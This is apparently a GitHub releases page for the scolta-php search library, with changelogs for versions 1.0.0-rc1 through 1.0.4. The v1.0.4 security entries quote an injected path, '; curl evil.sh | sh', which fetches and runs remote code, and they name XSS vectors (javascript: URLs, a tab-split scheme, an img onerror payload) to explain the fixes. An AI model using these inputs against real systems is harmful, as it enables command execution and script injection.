Skip to content

Releases: tag1consulting/scolta-php

v1.0.4

26 Jun 06:59
b2baf5a

Choose a tag to compare

Fixed

  • AI sort-intent no longer fires on a hard sort word buried in a conversational/descriptive query (src/Http/AiEndpointHandler.php, appendSortableFieldsInstruction()). Regression (terra-collecta, 2026-06-17): the query "I am looking for a gift for my friend who likes the cheapest handmade items" returned sort_hint: {field: "price", direction: "asc"} — but "cheapest" there describes the items the friend likes, not a request to order results by price; the user wants gift ideas, not a price-sorted list. The SORT INTENT prompt block already carried the buried-phrase/unsorted-list litmus guidance, but its only negative gift example used the soft qualifier "affordable", so the model let STEP 4's hard-word mapping (cheapest → price asc) override the conversational frame. The prompt now adds an explicit hard-word buried negative example (the exact failing gift query) plus two STEP 3 descriptive-frame bullets, and states that a hard sort word (cheapest, most expensive, newest, oldest, longest, …) embedded in a conversational/descriptive frame is STILL NOT primary sort intent — the framing overrides the STEP 4 word→field mapping. STEP 4 fires only when ordering results is the query's whole point. This is an LLM-adherence fix: it tightens the prompt without changing the parser. The prompt-construction tests assert the new guidance strings are present; a committed tests/fixtures/sort-intent-eval.json battery tracks the failing query, 3 buried-conversational variants (expectSort: null), and the true-positive controls (most expensive stone→price desc, cheapest crystals→price asc, bare cheapest→price asc, pierres les moins chères→price asc, newest posts/latest news→date desc, oldest articles→date asc) — final verification is the browser regression re-run against the live model, since CI cannot drive the LLM deterministically.
  • Dev-only files no longer ship in the Composer dist archive (.gitattributes, scripts/validate-dist-archive.sh). git archive HEAD (the tarball Composer downloads for a GitHub-hosted package) was still shipping phpstan.neon, phpstan-baseline.neon, and the tools/stemmer-golden Rust golden-data generator (a dev/CI-only stem oracle) to every Composer consumer: the PHPStan-config entry below claimed both neon files were excluded, but no export-ignore line backed the claim, and tools/ was never excluded at all. Added export-ignore for /phpstan.neon, /phpstan-baseline.neon, and /tools, so the published package is smaller and carries no dev tooling — none of the three is loaded at runtime (src/, templates/, assets/{js,css,wasm} are untouched). The dist-archive gate is tightened to match: the three move out of the top-level allowlist into the excluded-paths mirror, so the gate now asserts they are absent and any reappearance fails CI.
  • Auto-provisioned Amazee credentials stored without resolved model names no longer leave AI permanently broken (src/AiProvider/Amazee/AutoProvisioner.php). Provisioning persists credentials and resolves model names as two non-atomic steps (AmazeeTrialProvisioner::provision() stores the token+url, then calls /model/info). When the model-info call fails, getAvailableModels() swallows the error and returns [], so the $onModelsResolved gate never fires and no model name is persisted — but ConfigStorageInterface::load() requires only token+url, so it reports the half-provisioned credentials as valid. ensureAiAvailable() then short-circuited on load() !== null on every subsequent request and never re-resolved, so the caller fell back to the dated config default (claude-sonnet-4-5-20250929) which the Amazee LiteLLM gateway rejects with HTTP 400 "Invalid model name" — failing AI silently (summarize returns {}, expand returns an unexpanded 200) with no self-recovery. This is outside KeyExpiryRecovery's remit, which handles only auth-class failures. ensureAiAvailable() now accepts an optional $hasResolvedModels predicate: when stored credentials exist but the caller reports models are still unresolved, model resolution is re-attempted against the already-stored key (never a fresh trial, which would waste a server-limited allocation) and $onModelsResolved fires with the result, so the incomplete-provision state self-heals on the next lazy-init pass. Without the predicate the historical no-op is unchanged. A regression test drives the full provision → failed-resolution → store → re-resolve sequence. (The dated-default fallback itself lives in the platform adapters' client construction, which adopt the predicate when they re-vendor.)

Security

  • Configured Pagefind binary paths are now shell-escaped before execution (src/Binary/PagefindBinary.php). Both version() and the internal isExecutable() probe interpolated the binary path directly into exec($binary . ' --version 2>/dev/null'). The configured path can come from platform settings (admin forms, config files), so a value like /usr/bin/pagefind; curl evil.sh | sh executed a second command. A new public escapeShellCommand() helper applies escapeshellarg() to the whole path, special-casing known multi-word commands (npx pagefind is split and escaped per token so it still runs as command + argument). downloadTargetDir() also now throws on mkdir() failure instead of silently returning a directory that was never created. Regression tests assert the composed command string for metacharacter, command-substitution, embedded-space, and npx pagefind inputs — nothing is executed.
  • Markdown link URLs are scheme-gated on both renderers (src/Util/MarkdownRenderer.php + formatInline in assets/js/scolta.js). Both sides turned any [text](url) in AI output into a clickable link, so a javascript:/data: URL in a model response (or via prompt injection through indexed content) became a live link; the JS side's domain allowlist only engaged when allowedDomains was non-empty, i.e. it failed open in the default configuration. Both renderers now allow only absolute http(s) URLs and scheme-less relative paths, rendering everything else as plain text. Control characters and whitespace are stripped before scheme detection because browsers ignore them when parsing a scheme (jav\tascript: executes). The JS side additionally attribute-escapes the href (the summary text is escaped with escapeHtml, which leaves " intact, so a quote inside an otherwise-allowed URL could previously break out of the href attribute). Covered by PHPUnit tests (javascript:, data:, tab-split scheme, relative and http(s) controls) and JSDOM Jest tests driving the real rendering path.
  • Attribute interpolations in assets/js/scolta.js use a new quote-escaping escapeAttr(), and result-card hrefs are scheme-checked. escapeHtml() is a textContent → innerHTML round-trip that does not escape quotes, but it guarded attribute contexts: the LLM-generated expanded terms in data-scolta-search-term="…", filter dimension/value attributes on dismiss buttons and checkboxes, and the result-title title attribute — a value containing " could close the attribute and mint new ones (e.g. event handlers). Result cards also interpolated the raw ${url} into two hrefs, so a poisoned document URL like javascript:… became clickable. Every attribute interpolation now uses escapeAttr() (escapes &<>"'); escapeHtml() remains for text nodes. Result-card hrefs go through sanitizeUrlAttr(), which attribute-escapes allowed (http(s)/relative) URLs and renders anything else as inert #. JSDOM Jest regression tests (tests/js/security-render.test.js) prove a "-bearing expanded term cannot break out of its attribute and a javascript: result URL is not clickable.
  • stripHtml() in assets/js/scolta.js parses untrusted HTML in an inert document. It previously assigned untrusted excerpt/title HTML to innerHTML of a live detached <div>, whose subtree shares the page's document — resource-bearing elements (<img src onerror=…>) load eagerly there in real browsers. It now uses new DOMParser().parseFromString(text, 'text/html').body.textContent, which neither runs scripts nor loads resources. A Jest test drives an <img onerror> payload through the real render path, plus a structural pin that the function stays DOMParser-based (the behavioral test alone cannot catch a revert in JSDOM, which loads no resources either way).
  • FilesystemDriver::deleteDirectory() no longer follows symlinks (src/Storage/FilesystemDriver.php). The delete loop called rmdir/unlink on $item->getRealPath(), which resolves symlinks — deleting a retired index tree containing a planted (or accidental) symlink deleted the link target, potentially outside the tree (the recursive iterator does not follow links for traversal, but realpath re-introduced the hop at delete time). The loop now operates on getPathname() and unlinks links themselves (isLink() checked before the dir/file branch, since isDir() follows links too). A regression test builds a tree containing symlinks to an outside file and an outside directory and asserts both targets survive deletion. exists() also now calls validatePath() — it was the only driver method skipping the stream-wrapper guard every sibling applies.
  • Follow-up conversations enforce content-size caps (src/Http/AiEndpointHandler.php). handleFollowUp() validated roles and the message cadence but no sizes, while its sibling endpoints cap the query at 500 bytes and summarize context at 100k — a client could relay arbitrarily large payloads straight to the AI provider. Each message's content is now capped at 100,000 characters (mirroring the summarize context safety net, since the first user turn legitimately embeds search context) and the conversation total at 400,000 characters, both returning HTTP 400. The caps are measured in Unicode characters via `m...
Read more

v1.0.3

05 Jun 20:09
313e43e

Choose a tag to compare

Added

  • Regression snapshot test pinning the summarize CORPUS AWARENESS prompt bullet. A new test (testSummarizeCorpusAwarenessMatchesCanonicalSnapshot) reads tests/fixtures/corpus-awareness-bullet.txt and asserts the resolved 'summarize' template (DefaultPrompts::getTemplate()) contains that exact bullet byte-for-byte, guarding against silent drift (follow-up to the tag1consulting/scolta-core#33 corpus-statistic fix). The fixture is kept hand-identical to the matching bullet in scolta-core's SUMMARIZE constant. Test-only; no runtime change.
  • Category-member and context decomposition rules in the default expand_query prompt (tag1consulting/scolta-core#36). The 'expand_query' template (resolved server-side by DefaultPrompts for the AI path) gains two rules so the model decomposes a grouping into concrete terms instead of restating it as an abstract synonym: rule 13 (CATEGORY → MEMBERS) expands a category/family/region into its well-known members ("version control systems" → Git/Mercurial/Subversion; "Southeast Asian food" → Thai/Vietnamese/Indonesian), and rule 14 (CONTEXT / USE-CASE → CONCRETE ITEMS) expands a context/occasion into the item types that serve it ("home office setup" → standing desk/ergonomic chair/monitor arm). Both lead with non-food examples so the behavior generalizes across domains, and rule 13 forbids fabricating members for categories the model does not know — those fall back to normal alternate phrasings. The 2-4 term cap is reconciled to allow up to 6 concrete members when decomposing, and rule 7 is narrowed to taxonomy/filter-label matching so it no longer contradicts rule 13. Additive: queries that are not categories or contexts expand exactly as before. The template is byte-identical to scolta-core's EXPAND_QUERY constant; the browser-side WASM must be rebuilt downstream to match.
  • Round-robin AI-summary candidate selection across expansion sub-queries (#170). When a query fans out into distinct sub-topics of unequal corpus size (e.g. "traditional dishes from Southeast Asia" → Thai, Vietnamese, Indonesian, …), the relevance-union top-N that feeds the AI summarizer is filled entirely by the single largest sub-query, so the overview can only ever describe that one sub-topic. Two new browser-side config keys address this: expansionCombineMode (relevance_union default | round_robin) and expansionPerTermTopK (default 3). Under round_robin, scolta.js stamps each loaded result with the expansion sub-query that produced it (__scoltaSourceTerm), groups the summary candidate pool by that provenance, and deals the top-K from each sub-query in turn until aiSummaryTopN is filled — so the summarizer sees breadth across sub-topics. The reallocation stays within the existing aiSummaryTopN / aiSummaryMaxChars budgets and never exceeds them. The default relevance_union reproduces current behavior exactly, and the visible ranked result list is unchanged (always relevance-sorted) — round-robin only affects what the summarizer is shown. A single-sub-query pool (focused single-intent query) is identical to relevance_union.
  • ConfigReferenceDocTest — a CI guard that keeps docs/CONFIG_REFERENCE.md in sync with ScoltaConfig. The new test parses the property tables and preset table in CONFIG_REFERENCE.md and asserts that every documented scalar default equals the live ScoltaConfig default, that every scalar property is documented, and that every non-default preset override is documented with a matching value. It fails loudly if the tables can no longer be parsed, so a future doc reformat surfaces as a fixable failure rather than a silently-skipped check. This is the guard that would have caught the README default drift fixed in this release. The test also pins docs/TUNING.md: that guide restates the current global default for each scoring parameter it discusses (its **Config:** … — **Default: X** lines), and those restatements can drift independently of CONFIG_REFERENCE.md, so a new test_documented_tuning_guide_defaults_match_live_config asserts each one equals the live ScoltaConfig default too.
  • docs/TUNING.md — the canonical scoring-tuning evidence guide. Opens with a plain "choose your site type → preset" section for admins, then the full scoring-sweep evidence (precision-cliff data, per-parameter sweeps, methodology, and which defaults are still open findings) for maintainers. Cross-links CONFIG_REFERENCE.md for the property list and the site-type → preset table rather than duplicating them; CONFIG_REFERENCE.md's preset section now links back to it.
  • assets/ASSETS.sha256 manifest covering all duplicated front-end assets. The four browser assets duplicated into scolta-drupal and scolta-wp (js/scolta.js, css/scolta.css, wasm/scolta_core.js, wasm/scolta_core_bg.wasm) are now hashed into a single manifest, regenerated by the new composer update-asset-manifest script. The adapters drive both their dev-time copy and their CI drift guard from this one manifest, so a newly added asset can no longer be guarded in one place and forgotten in another. update-browser-wasm now regenerates the manifest after copying the WASM. The existing per-file assets/js/scolta.js.sha256 is retained (scolta-laravel's HealthController and StatusCommand read it at runtime as a bare hash) but is now derived from ASSETS.sha256 rather than hashed independently: update-js-checksum regenerates the manifest and then extracts the js/scolta.js line into the standalone file, so every asset SHA-256 comes from one computation and the two files can never diverge. A new AssetManifestTest fails CI if the committed manifest is stale, any listed asset is missing, the standalone checksum drifts from the manifest's js/scolta.js line, or that file stops being a bare 64-hex hash.
  • AiServiceAdapter::handlePossibleBudgetException() hook. The base message(), conversation(), and messageForOperation() methods now wrap their AI call in a try/catch (\RuntimeException) that invokes a new protected handlePossibleBudgetException() hook before re-throwing. The base hook is a no-op, so behavior is unchanged for callers; platform adapters (scolta-drupal, scolta-laravel, scolta-wp) override it to convert an Amazee budget-exhaustion error into AmazeeBudgetExceededException (and notify a budget handler) without each having to override all three AI methods. This removes the need for the three near-identical try/catch overrides duplicated in every adapter. Backward-compatible: an un-updated adapter that still overrides the three methods keeps working because the wrapper exception's message does not contain the Budget has been exceeded! guard string, so the doubled hook call is an idempotent no-op on the second pass.

Fixed

  • fromArray() now treats null as "not set," so adapters can fall through to a Site Type preset. The override loop previously assigned every key present in the input over the preset's values, with no way to express "this field is unset — use the preset." Adapters that omit a key (Drupal, WordPress) got preset fall-through for free, but an adapter whose config layer always emits a key for every field (notably Laravel's config/scolta.php) could never reach a preset's value — its concrete config default always won, leaving the entire Site Type preset (~12–15 scoring/display fields, not just expansionCombineMode) inert. fromArray() now skips any null value (null = "not set" → use the preset, or the base default when no preset is named); an explicit non-null value still overrides. This makes the unset contract explicit for every adapter and removes a latent TypeError (assigning null to a typed property previously threw). This is the central fix that enables adapters — especially Laravel — to honor presets; the Laravel config defaults switch to null in its own PR. CONFIG_REFERENCE.md documents the contract in prose.
  • AI summaries no longer truncate mid-sentence on multi-item results (#168). aiSummaryMaxTokens defaulted to 512, but max_tokens is a hard ceiling, not a target — a 6-item summary with one-sentence descriptions plus ad-hoc subcategory headers overran it and was cut at the token boundary mid-word. Two complementary fixes: the default is raised to 1024 (the prompt structurally bounds real output to ~300–600 tokens, so this adds headroom without inviting longer output), and the 'summarize' template's FORMAT RULES now state an explicit output-length budget — keep the summary under ~150 words, with a single flat bulleted list and no section/sub-category headers. The raised ceiling guarantees nothing is cut; the stated budget keeps natural output short. No preset overrides ai_summary_max_tokens below the default. The prompt line matches scolta-core's SUMMARIZE constant.
  • Removed the Wikipedia-specific corpus statistic from the default summarize prompt. The CORPUS AWARENESS rule in the 'summarize' template shipped a hard-coded "~6,900 Featured Articles" example that described only the Wikipedia demo, reached every site using the default prompt (the server resolves this template for the AI overview), and taught the model to fabricate corpus counts. The example is now count-free and frames gaps via the site description's scope, and the rule explicitly forbids inventing statistics (counts, totals, sizes). Matches the same change in scolta-core's SUMMARIZE constant (tag1consulting/scolta-core#33).

Changed

  • **Facet panel is now index-driven and static, with exact typed-query counts that don't move on AI expansion or when you click a fac...
Read more

v1.0.2

03 Jun 06:41
e71c479

Choose a tag to compare

Removed

  • Reverted the entire query-word-importance line (#163 exemption + #164 ranking). Validation showed both layers were inert — the #164 incidentalMatchWeight re-ranking and the #163 semantic exemption gate changed result ordering on zero real queries. Removed: the query_word_importance plumbing into the WASM score_results input and the JS fallback weighting, the incidentalMatchWeight config, the aiQueryWordImportance flag, the expand-prompt classification instruction and its query_word_importance parsing in AiEndpointHandler, the contentWords exemption gate in scolta.js, and the bundled WASM that carried the scoring weight. The #156 frequency guard (#161) and the Fix A/D typed-query-term exemption + expandSubwordDenyList veto (#162) are unchanged — the browser tree is back to its #162 state, with the bundled WASM matching the reverted scolta-core.

Fixed

  • Sub-word frequency guard no longer drops words the user actually typed (#156 follow-up). The #156 guard used corpus frequency as a proxy for "non-discriminating / generic," but in a topical corpus a word is often high-frequency because it is the subject matter — the proxy conflates "common because central" with "common because generic." So searching spicy on a recipe corpus had its typed subject word (~6.4% of docs, above the 0.05/0.10 threshold) silently dropped from the decomposed expansion terms, collapsing recall. The frequency check is now bypassed for any sub-word that is a token of the user's actual query (Fix A), with a per-site expandSubwordDenyList veto for the rare word that is both typed and genuinely generic (Fix D). Non-query expansion-derived words (e.g. fried, tender) remain frequency-gated as before.
  • customStopWords now applied consistently in scolta.js (#156 follow-up). extractSearchTerms() previously filtered against only the built-in STOPWORDS set, so JS query tokenization ignored customStopWords while the WASM scorer honored it. JS now strips the union of STOPWORDS and customStopWords, matching WASM.
  • Broad multi-word queries recover the recall lost in v1.0.0 (closes #156). Commit 690a2288 removed the sub-word expansion block from scolta.js, causing broad-query result counts to drop 4–50× on high-overlap corpora. Sub-word expansion is reintroduced behind a corpus-frequency guard: a multi-word expansion term's constituent words are added as search terms only when each word's corpus frequency is below expandSubwordMaxFrequency (default 0.05; 0.10 for the content_catalog and none presets). This restores low-frequency domain words ("vegetarian", "cuisine") while blocking high-frequency noise ("recipes", "cooking") that polluted pre-v1.0.0 results. Frequency is measured against the same active filters the search uses (including the language partition when autoLanguageFilter is on), so the denominator matches the corpus actually being searched. The guard applies in both the relevance and native-sort code paths. Setting the threshold to 0 reproduces v1.0.0 (no sub-words); >= 1.0 reproduces the pre-v1.0.0 behavior (all sub-words).

Added

  • expandSubwordDenyList config option (default []). Guard-only veto list for the sub-word query-term exemption (#156 follow-up). Words here are never auto-exempted from the sub-word frequency guard even when the user types them, so a site can stop a typed generic word (e.g. hot on a recipe corpus) from re-flooding results via the exemption. Unlike customStopWords this does NOT affect relevance scoring or query tokenization — the word stays searchable and scorable. Configurable via expand_subword_deny_list in all platform adapters.
  • expandSubwordMaxFrequency config option (default 0.05). Maximum corpus frequency (fraction of indexed documents) for a multi-word expansion term's constituent word to be added as a standalone search term. Configurable via expand_subword_max_frequency in all platform adapters. Presets content_catalog and none ship 0.10; reference, ecommerce, and blog use the 0.05 default. Set to 0 to disable sub-word expansion entirely.
  • Result-count baseline regression test (tests/js/result-count-baseline.test.js + tests/fixtures/result-count-baseline.json). Drives the real scolta.js guard against a synthetic corpus built from real measured frequencies and asserts merged result counts stay within a per-demo band, flagging both recall collapse (sub-word block removed) and precision spikes (high-frequency noise admitted). This is the regression guard whose absence let 690a2288 ship a silent count drop.
  • Sub-word frequency guard behavioral test (tests/js/subword-frequency-guard.test.js). Executes scolta.js against a recording Pagefind mock and asserts only sub-words below the threshold feed results, covering the boundary behaviors (0 and >= 1).

Changed

  • Opened 1.0.2-dev development cycle.
  • Scoring default tuning from the full-matrix sweep (120+ queries, 9 demos). crossListBonus default 0.15 -> 0.05 (a smaller tie-breaker that doesn't override single-source precision); recencyBoostMax default 0.5 -> 0.25, with preset overrides reference: 0, content_catalog: 0, and blog: 0.25 (recency adds noise on non-time-sensitive content); titleMatchBoost default 1.0 -> 2.0 (improves top-1 precision across all demos; already shipped in the reference/content_catalog presets). These are ranking-quality changes independent of the #156 recall fix.

v1.0.1

30 May 18:50
91cbd51

Choose a tag to compare

Fixed

  • Binary indexer now emits canonical URLs instead of build-artifact URLs. ContentExporter writes exported HTML files in a nested directory structure mirroring the canonical URL (/recipe/cake/recipe/cake/index.html) so Pagefind --site derives data.url identical to the PHP indexer. Previously, flat {id}.html exports caused data.url = /{id}.html — a path that 404s on the live site. Resolves the root cause behind #155 and closes #157.
  • AI summary citation URLs now prefer canonical meta.url over Pagefind file path. Both summarizeResults() (WASM path) and buildLLMContext() (JS fallback) now use r.data.meta?.url || resolveUrl(r.data.url), matching the pattern already used in the result card renderer. Fixes #155.
  • Added vendor/ to archive.exclude in composer.json to prevent dev vendor/ from leaking into dist archives when installed via Composer path repositories.

Added

  • ContentExporter::urlToExportPath() — maps a canonical URL to the export file path Pagefind will crawl. Shared by all platform adapters.
  • ContentExporter::countHtmlFiles() — recursive HTML file count, replacing flat glob('*.html') in adapters.
  • ContentExporter::writeManifest() / readManifest() — ID-to-path manifest for incremental deletes in the nested layout.
  • ContentExporter::deleteById() / deleteByUrl() — delete export files by item ID (manifest + flat fallback) or canonical URL.
  • Indexer URL parity test (IndexerUrlParityTest) that joins fragments by stable item ID and asserts data.url equality, collision detection, and urlToExportPath mapping correctness.
  • Citation URL structural tests in JS test suite — locks the meta.url || fallback pattern in both summary builders.

Documentation

  • Clarified independent versioning model. CLAUDE.md, CHANGELOG.md, and UPGRADE.md now state that minor and patch versions are released independently per package, with adapters pinning scolta-php via composer.lock within their ^1.x constraint. Added a comment to scripts/check-version-sync.php noting it is a local-only major check.

Upgrade notes

Binary-indexer sites must run a full rebuild after upgrading. The export layout changed from flat {id}.html to nested directories mirroring canonical URLs. A stale index will retain the old /{id}.html URLs that 404 on the live site. The health-check warning added in #158 will surface a pre-fix index automatically.

Scolta 1.0.0

27 May 15:46
043b70d

Choose a tag to compare

Scolta 1.0.0

AI-powered search for Drupal, WordPress, and Laravel — now stable.

What is Scolta?

Scolta is an open-source, AI-powered search platform that replaces the default search on Drupal, WordPress, and Laravel sites with intelligent, semantic search. It uses a Rust/WASM core for scoring, query expansion, and relevance ranking, with a shared PHP library and thin CMS-specific adapters. Scolta is built by Tag1 Consulting and powered by Amazee.ai for AI infrastructure.

scolta-php is the shared PHP library that all CMS adapters depend on. It provides the PHP indexer, AI summary with streaming, query expansion, filter/sort infrastructure, and content management layer that powers every Scolta installation.

1.0.0 Stable Release

This is the foundation library that Drupal, WordPress, and Laravel packages build on. Highlights of the stable release:

  • PHP indexer with no binary dependency — index content using pure PHP
  • AI summary with streaming for real-time answer generation
  • expand_query with disambiguation for intelligent query rewriting
  • Filter/sort infrastructure with two-pass matching, subcategory support, and price sort patterns
  • Memory pressure handling with stream tokenization for large sites
  • API error handling (401/429/503) with graceful degradation
  • Amazee.ai provider support for managed AI infrastructure
  • E2E test suite covering the full search pipeline

Changes Since RC4

Search Quality

  • Subcategory matching in filter field descriptions
  • exactTitleMatchBoost config option for precise title relevance
  • crossListBonus config option for multi-index scoring
  • Expansion merge cross-list bonus scoring
  • Expansion phrases no longer word-exploded
  • Sort-intent fallback when Pagefind returns few results
  • Sort-without-filter fallback
  • Sort intent no-fallback rule

Filters and Facets

  • Filter exact-match-first (two-pass matching)
  • filter_hint canonicalization against Pagefind filters
  • Ascending price sort patterns recognized
  • Subject filter UI state updates (badges + checkboxes)
  • Multi-value filter array counting fix
  • Multi-value facet OR syntax fix
  • Facet count refresh after filter selection
  • Filter+sort discovery replacing intersection heuristic

AI Overview

  • AI Overview italic/bold+italic markdown rendering
  • Corpus-awareness in summarize/follow-up prompts
  • AI Summary reflects user-selected facet filters
  • StreamingFormatWriter multi-value filter fix

Indexer

  • PHP indexer memory reduction (stream tokenization)
  • Index completeness verification on exit
  • PhpIndexer sortable/metadata passthrough fix
  • Memory regression test for processChunk()

Infrastructure

  • Filter field description validation test

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0/CHANGELOG.md

Getting Started

composer require tag1/scolta-php

Most users will install one of the CMS-specific packages (scolta-drupal, scolta-laravel, or scolta-wp), which pull in scolta-php automatically.

Scolta 1.0.0-rc4

18 May 11:39
19f1a52

Choose a tag to compare

Scolta 1.0.0-rc4

Fourth release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.

Highlights

Fixed

  • Expand-query prompt disambiguation — Rule 9 now uses the site's domain context to disambiguate multilingual queries before falling back to generic interpretation. A German query like "Zweig" on a Git docs site is now expanded to branch-related terms instead of famous authors.
  • Composer archive excludes tests/composer.json archive.exclude prevents ~4 MB stemmer corpus and fixtures from shipping in dist archives.
  • API error handlingAiClient now throws ApiKeyInvalidException (401) and RateLimitException (429 + Retry-After header) instead of wrapping all upstream errors as generic 503.
  • E2E test race conditionuniqid() collision on multi-vCPU CI fixed by appending getmypid() to state-directory names.
  • Foreign language "No Results Found" flash — UI now suppresses premature empty-state display while AI expansion is still translating/expanding the query.
  • Follow-up queries resolve numbered result references — "#6", "the third one", etc. now map to the correspondingly numbered entry in search context.
  • Sort-intent prompt restructured as a 4-step decision sequence to eliminate false positives (discovery qualifiers) and false negatives (adverb+participle recency forms).

Added

  • showAttribution config option — opt-in "Powered by Scolta" display (default false), per WordPress.org Guideline 10.
  • .gitattributes export-ignore — dev files (tests/, .github/, benchmarks/, scripts/) excluded from git archive distributions.
  • AI Overview metadata enrichment — structured metadata per result with sort/filter indicators in LLM context.
  • Generic sort and filter prompt infrastructuresortableFieldDescriptions, filterFields, filterFieldDescriptions config properties.
  • Memory pressure handlinggc_mem_caches() on PHP 8.3+, RSS-based 75% threshold voluntary restart.
  • Sort override subject filter — parallel subject-only search intersects with sorted results to prevent irrelevant items.
  • Pagefind native sort — sort hints now use Pagefind's index-level sort instead of client-side reranking.
  • Auto date sortable fieldContentItem::$date automatically included in sort attributes.
  • ContentItem::cloneWith() — safe field-level overriding without silent field loss.
  • Multi-value filter support in PagefindHtmlBuilder.

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc4/CHANGELOG.md

⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues

Scolta 1.0.0-rc3

13 May 15:04
cb8b78b

Choose a tag to compare

Scolta 1.0.0-rc3

Third release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.

Highlights

  • Fixed inverted expand_primary_weight merge semantics. The WASM N-set merge was applying the configured weight to expanded results instead of original results, inverting the documented behavior. expand_primary_weight: 0.9 now correctly gives original query results 90% weight and expansion results 10%.
  • expandPrimaryWeight now included in expand-query API response payload.

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc3/CHANGELOG.md

⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues

Scolta 1.0.0-rc2

12 May 18:55
b5dcce7

Choose a tag to compare

Scolta 1.0.0-rc2

Second release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.

Changes since rc1

  • update-js-checksum composer script. Regenerates assets/js/scolta.js.sha256 after editing the canonical JS file: composer run update-js-checksum.
  • scolta.js auto_language_filter now overrides stale URL f_language params on language switch.
  • Pagefind filter index CBOR structure corrected to match Pagefind CLI output. Any filter-based search returned 0 results with the previous structure.
  • ScoltaConfig::fromArray() now coerces string values to the correct PHP type before assignment. Fixes TypeError crash on Drupal sites using drush config:set.
  • ScoltaConfig::$aiSummaryMaxTokens default restored to 512.
  • ScoltaConfig::$autoLanguageFilter added (default false). Language filter is now opt-in.
  • scolta.js filter sidebar counts restored from computeFilterCounts(allScoredResults).
  • auto indexer now always means PHP on all code paths.

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc2/CHANGELOG.md

⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues

Scolta 1.0.0-rc1

11 May 21:08
708c688

Choose a tag to compare

First stable release — all features from 0.3.x promoted to 1.0 API surface.

Fixed

  • scolta.js initPagefind() now uses a module-level pagefindInstance guard to prevent calling pagefind.init() more than once per page. Pagefind uses a SharedWorker that persists across navigations; calling init() a second time (e.g. on Drupal behavior re-attachment after a language switch) corrupts the WASM pointer permanently, causing "No pointer" errors and zero search results for the remainder of the tab session. The guard is stored in the outer IIFE scope so it spans all createInstance() calls on the same page.
  • Summarize endpoint no longer returns HTTP 400 on large result sets. The context parameter validation limit has been raised from 50,000 to 100,000 characters. The client truncates to 49,000 characters before sending, so this server-side limit acts as a safety net only.
  • IndexBuildOrchestrator now reports failure when the atomic swap or post-build sanity check fails. Two silent failure modes are closed: (1) atomicSwap() now throws RuntimeException if any rename() call returns false, so a failed filesystem rename can no longer cause a false-success result; (2) after the swap, verifyOutputHasFragments() checks that the pagefind output directory contains at least one .pf_fragment file when pages were processed — zero fragments after a non-empty build is treated as a hard failure. Both errors surface through the existing try/catch and are returned as success: false with a descriptive error string. (scolta-php#46)
  • ContentExporter::filterItems() no longer crashes on CachedContentReference objects during re-index. When a prior build's timestamp manifest exists, gather() yields a mix of ContentItem and CachedContentReference objects (cache-hit markers for unchanged posts). filterItems() previously accessed $item->bodyHtml on every item, which is not a property of CachedContentReference. Added instanceof CachedContentReference type guard to pass cached items through without inspection. Fixes PHP fatal error on WordPress and any other platform on any site with a prior build.
  • AI summary max_tokens raised from 512 to 1024. The previous limit caused the AI to truncate mid-markdown on multi-result summaries — the last result was particularly vulnerable. The new default halves truncation frequency. The value is now configurable via ScoltaConfig::$aiSummaryMaxTokens.
  • cleanBrokenMarkdown() added to scolta.js before formatSummary() renders markdown to HTML. Mirrors the existing PHP MarkdownRenderer::cleanBrokenLinks() salvage logic: unclosed markdown links become bold text, unclosed bold/italic/backtick delimiters are closed. Prevents truncated AI output from producing broken HTML in the browser.
  • AiClient now auto-appends /v1/chat/completions to OpenAI base_url values that have no path. LiteLLM proxies (including Amazee.ai) return a base URL without a path component. Passing that URL directly caused 405 Method Not Allowed errors. When the base_url has no path (or only /), the standard OpenAI chat completions path is appended automatically. URLs that already contain a path are used as-is.
  • AmazeeClient::provisionTrial() and signIn() now parse the nested API response format, and token validation is removed from the provisioning path. The Amazee.ai /auth/generate-trial-access endpoint now returns credentials nested under a key object, and signIn wraps the access token under a token object. Both methods now check for the nested format first and fall back to the legacy flat format for backwards compatibility. The post-provisioning validateToken() call is removed from provisionTrial() because the /auth/me endpoint no longer exists on Amazee.ai's LiteLLM proxy — the token issued by the provisioning API is trusted directly.
  • scolta.js result URLs resolved against pagefind base path instead of site root. pagefindBase was stored as an absolute URL (with origin), but pagefind.js returns root-relative URLs after applying its baseUrl (a path, not an origin). The startsWith check never matched, so the pagefind prefix was never stripped — result links pointed to /wp-content/uploads/scolta/pagefind/product/… instead of /product/…. pagefindBase is now stored as a path-only value by stripping the origin via new URL().pathname when the pagefind path is absolute.
  • Adapter install — Drupal CI job failed because the release-validation workflow replaced the entire repositories array (wiping the packages.drupal.org/8 Drupal Packagist entry) instead of only swapping the local path repo for the GitHub VCS repo. The PHP inline script now filters out only the path-type scolta-php entry and appends the VCS repo, leaving other repository sources (including the Drupal Packagist) intact.
  • Search status message text no longer overflows on narrow viewports. .scolta-results-header now carries overflow-wrap: break-word and word-wrap: break-word, and its first-child <span> gains min-width: 0 so the flex item can shrink below its content size. Long messages (e.g. "— no exact matches found, showing partial matches") wrap correctly at 320 px, 768 px, 1024 px, and 1440 px viewport widths. (#51)
  • Memory profile documentation claimed "peak RSS ≤ 96 MB" for the conservative profile, but 96 MB is Scolta's internal allocation budget — total process RSS also includes the PHP runtime baseline (typically ~60 MB for Laravel CLI, ~80 MB for WordPress, ~130 MB for Drupal) and I/O overhead. PHPDoc for MemoryBudget::conservative(), MemoryBudgetSuggestion::suggest() reason strings, and checkProfileFit() warning messages now use "internal allocation budget" rather than "peak RSS". The README Memory and Scale section is updated with a platform baseline table and corrected estimates for total expected RSS per profile. The balanced and aggressive README comments ("~200 MB peak RSS" and "~384 MB peak RSS") are corrected to match the actual internal budget values (384 MB and 1 GB). (scolta-php#47)
  • HealthChecker no longer reports ai_configured: true when the API key is whitespace-only. The previous !empty() check treated strings containing only spaces or tabs as configured. Changed to trim() !== '' so only non-empty, non-whitespace keys (including Amazee.ai tokens stored as the API key) report as configured.
